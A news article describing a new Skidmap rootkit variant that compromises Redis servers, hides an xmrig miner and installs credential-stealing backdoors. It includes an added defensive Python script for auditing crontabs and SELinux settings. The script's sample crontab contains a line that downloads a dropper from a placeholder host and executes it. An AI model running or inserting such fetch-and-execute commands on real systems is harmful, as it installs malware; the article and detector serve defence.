New Skidmap Rootkit Variant Targets Enterprise Linux Servers via Redis Vulnerabilities
Cybersecurity analysts at Doctor Web have identified a new modification of the notorious Skidmap mining trojan targeting Linux machines. This advanced rootkit operates as a malicious kernel module, adeptly concealing its cryptocurrency mining activities by providing falsified system information about CPU usage and network activity. The attack appears indiscriminate but primarily affects the enterprise sector—large servers and cloud environments—where mining efficiency and profits can be maximized.
The attack exploits vulnerabilities and misconfigurations in the Redis database management system, the world's most popular NoSQL database, used by giants like X (formerly Twitter), Airbnb, and Amazon. While Redis offers maximum performance and supports various data types and programming languages, it was never intended to be deployed at the network edge. As a result, its default configuration offers only basic security features, and versions prior to 6 lack access control and encryption mechanisms altogether.
In 2023 alone, Redis experienced 12 vulnerabilities, three of which were deemed “Serious.” The growing number of compromised servers installing mining programs piqued the interest of Doctor Web’s virus lab. To study the attacks firsthand, they set up an unprotected Redis server as a honeypot, which was attacked 10,000 to 14,000 times monthly over a year. Recently, the server was compromised by the anticipated Skidmap trojan modification, but with an unexpected twist: cybercriminals used a new method to hide the miner’s activity and installed four backdoors simultaneously.
First making headlines in 2019, the Skidmap trojan specializes in targeting enterprise networks to maximize stealth mining profits. Despite five years since its debut, its core operation remains unchanged:
- Exploitation: The trojan infiltrates systems by exploiting vulnerabilities or misconfigured software.
- Dropper Deployment: Attackers add a task to the system scheduler that downloads the Linux.MulDrop.142 dropper every 10 minutes.
- System Checks and Disabling Security: The dropper checks the OS kernel version and disables the SELinux security module.
- Payload Unpacking: It unpacks:
  - Linux.Rootkit.400 rootkit
  - Linux.BtcMine.815 miner
  - Linux.BackDoor.Pam.8/9 and Linux.BackDoor.SSH.425/426 backdoors
The dropper is notable for its size, containing about 60 executables for various Linux distributions, primarily Debian and Red Hat Enterprise Linux, common in server environments.
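Because the rootkit spoofs CPU and network statistics only after it is loaded, the scheduler entry that re-fetches the dropper every 10 minutes and the disabled SELinux policy are indicators a defender can still check directly. The following added example (not Doctor Web's code, and not derived from the samples) audits crontab text for short-interval download jobs and checks a SELinux config for the disabled state; it assumes a standard cron `*/N` line invoking curl or wget, uses a placeholder URL, and assumes the dropper leaves SELinux disabled in the config file, which the article does not state.

```python
import re

# Constructed sample crontab (not real indicators): one benign backup job and
# one Skidmap-style fetch every 10 minutes. The URL is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://PLACEHOLDER.example/dropper -o /tmp/dropper && sh /tmp/dropper
"""

# Download tools a planted cron entry typically invokes, followed by a URL
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b.*https?://", re.IGNORECASE)
# Lines of the form "*/N * * * * <command>" (run every N minutes)
EVERY_N_MIN_RE = re.compile(r"^\*/(\d+)\s+\*\s+\*\s+\*\s+\*\s+(.*)$")


def find_periodic_downloads(crontab_text, max_minutes=15):
    """Return (interval_minutes, command) for each cron line that runs at a
    short minute interval and fetches something over HTTP(S)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = EVERY_N_MIN_RE.match(line)
        if not m:
            continue
        interval, command = int(m.group(1)), m.group(2)
        if interval <= max_minutes and DOWNLOADER_RE.search(command):
            hits.append((interval, command))
    return hits


def selinux_disabled(config_text):
    """True if the given /etc/selinux/config content sets SELINUX=disabled.
    Assumption: the dropper's SELinux change persists in this file."""
    for line in config_text.splitlines():
        key, _, value = line.strip().partition("=")
        if key.strip() == "SELINUX" and value.strip().lower() == "disabled":
            return True
    return False


if __name__ == "__main__":
    for interval, cmd in find_periodic_downloads(SAMPLE_CRONTAB):
        print(f"suspicious cron job: every {interval} min -> {cmd}")
```

On a live host, feed the function the output of `crontab -l` for each user plus the contents of /etc/cron.d, and treat any hit as a lead to confirm with an out-of-band tool, since the rootkit falsifies in-band diagnostics.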
Once installed, the rootkit intercepts numerous system calls, generating fake responses to administrative diagnostic commands. Intercepted functions include those reporting:
- Average CPU usage
- Network activity on specific ports
- File directory listings
It also monitors all kernel modules being loaded, preventing those capable of detecting its presence from running. This comprehensive obfuscation thoroughly hides all aspects of the miner’s cryptocurrency activities—computation, hash transmission, and job reception.
The attack installs four backdoors to:
- Collect SSH credentials from the compromised machine and send them to attackers
- Create a master password for all system accounts (encrypted using a Caesar cipher with a four-letter offset)
Additionally, the Linux.BackDoor.RCTL.2 remote access trojan is installed, allowing attackers to send commands and exfiltrate data via an encrypted connection that the trojan initiates, effectively bypassing routing issues.
The attackers deploy the xmrig program to mine cryptocurrencies, notably Monero, known for its transaction anonymity and popularity on the darknet. Detecting such a miner cloaked by a rootkit in server clusters is exceptionally challenging. With diagnostic data spoofed, potential indicators of compromise include:
- Excessive power consumption
- Increased heat generation
However, attackers may adjust the miner’s settings to balance performance and stealth, further reducing the likelihood of detection.